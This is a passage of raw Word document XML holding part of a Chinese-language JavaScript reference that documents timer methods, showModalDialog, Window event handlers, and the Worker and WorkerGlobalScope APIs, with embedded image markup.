        <w:t>interval</w:t>
      </w:r>
      <w:r>
        <w:t>就重复调用一次。当前窗口将作为调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值，同时所有传入</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval</w:t>
      </w:r>
      <w:r>
        <w:t>的额外参数</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>将传入</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个数字，稍后可以将这个数字传入到</w:t>
      </w:r>
      <w:r>
        <w:t>Window.clearInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>来取消这段代码的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于历史原因，</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>可能是一段字符串形式的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码而不是一个函数。在这种情况下，这段字符串将每隔</w:t>
      </w:r>
      <w:r>
        <w:t>interval</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒求值（就像它们是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞）一次。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你想推迟一段代码的执行，但不希望它重复执行，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long setTimeout(function f,unsigned long timeout,any args...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>，不同之处是它只执行指定的函数一次：它将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>注册为</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒后调用，并返回一个数字，稍后可将这个数字传入</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>learTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>来取消延迟的调用。当指定的时间过去后，</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>将作为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的一个方法调用，同时会传入任意指定的</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>是一个字符串而不是一个函数，则它将在</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒后执行，执行效果就像它是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>any showModalDialog(string url,[any arguments])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，将它的</w:t>
      </w:r>
      <w:r>
        <w:t>dialogArguments</w:t>
      </w:r>
      <w:r>
        <w:t>属性设为</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>，在这个窗口中加载</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>，然后阻塞进程，直到这个窗口关闭。一旦关闭，它将返</w:t>
      </w:r>
      <w:r>
        <w:t>回这个窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>returnValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性。讨论及示例参见</w:t>
      </w:r>
      <w:r>
        <w:t>14.5</w:t>
      </w:r>
      <w:r>
        <w:t>节和例</w:t>
      </w:r>
      <w:r>
        <w:t>14-4</w:t>
      </w:r>
      <w:r>
        <w:t>。</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大多数发生在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上的事件会在文档树中向上冒泡，到达</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，然后再到达</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。所以，在</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>上列出的所有事件处理程序属性都可以用在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上。另外，还可以使用下面列出的事件处理程序属性。由于历史原因，这儿列出的每个事件处理程序属性也都可以（作为一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性或</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性）定义在＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251784192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="3234905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="128" name="00128.jpeg" descr="00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8.jpeg" descr="00128.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId131"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="3234905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251785216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4144992" cy="2536166"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="129" name="00129.jpeg" descr="00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29.jpeg" descr="00129.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId132"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4144992" cy="2536166"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="885" w:name="Worker"/>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="885"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>表示一个后台线程。可使用</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>，传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>让它执行。在那个文件中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码可以使用同步的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>或者执行计算密集型任务而不会导致主</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>线程冻结。</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>在一个完全隔离的执行上下文（参见</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>）中执行它们的代码，与一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>交换数据的唯一方式是使用异步事件。可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>来向</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>发送数据，然后处理消息事件以接收来自这个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程的介绍可参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</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Worker(string scriptURL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并让它执行</w:t>
      </w:r>
      <w:r>
        <w:t>scriptURL</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void postMessage(any message,[MessagePort[]ports])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>发送消息</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>给指定</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>，这个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>将以发送到它的</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序的</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象的形式接收这条消息。</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>可以是一个</w:t>
      </w:r>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>avaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的原始值、对象或数组，但不能是函数。客户端类型（如</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>）是允许的，但不允许如</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>（细节可参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可选的</w:t>
      </w:r>
      <w:r>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:t>参数是一个高级特性，允许传入一个或多个直接通信通道到</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中。例如，如果创建了两个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象，可以通过为它们分别传入</w:t>
      </w:r>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>的一个终端让它们直接相互通信。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void terminate()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>停止当前</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>并中止它正在执</w:t>
      </w:r>
      <w:r>
        <w:t>行的脚本。</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由于</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>在一个与创建它的环境完全分离的执行环境中运行代码，因此它与它的父线程通信的唯一方式就是事件。可以使用下面的属性来注册事件处理程序或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>正在执行的脚本中抛出异常，并且这个错误没有被</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序处理时，这个错误将在当前</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件。与这个事件关联的事件对象是一个</w:t>
      </w:r>
      <w:r>
        <w:t>ErrorEvent</w:t>
      </w:r>
      <w:r>
        <w:t>。这个错误事件不会冒泡。如果这个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>属于另一个</w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>orker</w:t>
      </w:r>
      <w:r>
        <w:t>，取消这个错误事件将阻止它向上传播到父</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>。如果当前</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象已经在主线程中，取消这个事件可能会阻止它在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>控制台中显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>正在运行的脚本调用它的全局</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（参见</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>）时，将会在这个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个消息事件。传给这个事件处理程序的对象是一个</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>，它的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性包含这个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>脚本传给</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>的值的一个副本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="886" w:name="WorkerGlobalScope"/>
      <w:r>
        <w:t>WorkerGlob</w:t>
      </w:r>
      <w:r>
        <w:t>alScope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="886"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程运行在一个和生成它的父进程完全不同的执行环境里。</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>的全局变量是一个</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因此这个</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>页面在一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中描述了对应的执行环境。由于</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局对象，因此它继承自核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这儿列出的属性，</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的所有全局属性，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly </w:t>
      </w:r>
      <w:r>
        <w:t>WorkerLocation location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性类似于</w:t>
      </w:r>
      <w:r>
        <w:t>window.location</w:t>
      </w:r>
      <w:r>
        <w:t>对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象：允许一个</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>检查它加载自哪个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，同时包含一些返回这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的独立部分的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly WorkerNavigator navigator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性类似于</w:t>
      </w:r>
      <w:r>
        <w:t>window.navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>可根据它定义的属性判断当前它正在运行的浏览器以及它当前是否在线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly WorkerGlobalScope self</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
